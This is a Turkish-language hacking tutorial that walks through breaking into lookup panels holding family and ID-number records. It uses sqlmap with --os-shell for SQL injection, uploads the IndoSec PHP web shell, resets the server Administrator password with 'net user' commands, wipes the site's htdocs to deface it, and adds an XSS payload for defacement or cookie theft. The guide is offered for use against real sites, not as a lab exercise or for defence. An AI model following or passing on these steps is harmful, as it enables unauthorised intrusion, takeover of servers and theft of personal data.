Merhaba Arkadaşlar Bu Konumda Sorgu Panellerini Hacklemeyi Öğreticem Başlayalım

Öncelikle Programlarımızı Kuralım.

- BurpSuiteyi Kurun Professional / Community 2023.9.3
- SQLMAP KURUN sqlmap.org
- FireFox Tarayıcı Kurun.

ARDINDAN BURP SUİTEYİ AÇIN
FİREFOXU AÇIN
SQLMAPİ MASAÜSTÜNE ATIN
CMDYİ AÇIN
cd (klasöru sürekleyin)

Burp İsteklerin Çekilmesi İçin Gerekli Proxy Ayarları Yapılmalıdır Onuda Anlatayım.

FireFoxa Girin.
Sağ Üstten 3 Noktaya Basın
Ayarlara Basın
En Aşşağı inin Ağ Ayarlarına Basın
Vekil Sunucusunu Manuel Olarak Ayarlar
PORT KISMINA 8080 YAZIN HEPSİNE
SOL KUTUCUĞA 127.0.0.1 Local İP Girin
'KURULUM BU KADARDI'

Şimdi Gelelim Asıl Konuya 

Öncelikle Herhangi Bi Panele Girin.
Aile & Sülale & Soyağacı & Kütük Sorgularından Herhangi Birisine Girin
TC YAZIN 11111111110 YADA 22222222220
BURP SUİTE PROXY>Intercept is Off Butonuna Basın ON Olacak
SORGULA BUTONUNA BASIN.
Burp Suite Gelin Gelen Raw Metnini Kopyalayın
Sqlmapin Klasörünü Açıp request.txt dosyası oluşturun ve içine yapıştırın kaydedin kopyaladığımız raw metnini
CMDYİ TEKRAR AÇIN python sqlmap.py YAZIN
ARDINDAN python sqlmap.py -u request.txt --os-shell
GELEN SORULARA Y/N YANIT VERİN
HANGİSİ BÜYÜK HARFSE ONA GÖRE YANITI VERİNİZ! ÖRNEK y/N = N yazarsınız yada Y/n = Y Yazarsınız.
SONRA siteurl/shell.php GİBİ BİR DOSYA URLSİ VERİR ONU GOOGLE YAPIŞTIRIN
İNDOSEC SHELL İNDİRİN (https://github.com/holiq/IndoSec-sHell)
İNDOSEC.PHP Yİ SİTEYE UPLOAD EDİN
siteurl/indosec.php
GİRİŞ İÇİN IndoSec Yazın
SOLDA CMD KOMUTLARI İÇİN YER VAR ORAYA
curl **.sb VDS İPSİ ÖĞRENİN
net user Administrator @betahackkk
net localgroup administrators Administrator
VDSE GİRİN
Kullanıcı Adı @betahackkk
Şifre @betahackkk

Xamppi Açın htdocsa girin bütün dosyaları silip indexinizi yükleyin

hem vdsi şifresi değişti hemde siteye index bastınız 

BUNLAR İŞE YARAMADIYSA

İp Sorgu > <script>alert('t.me/betahackkk')</script>

xss mevcut çoğu panelde index basıp yada cookie çekebilirsiniz.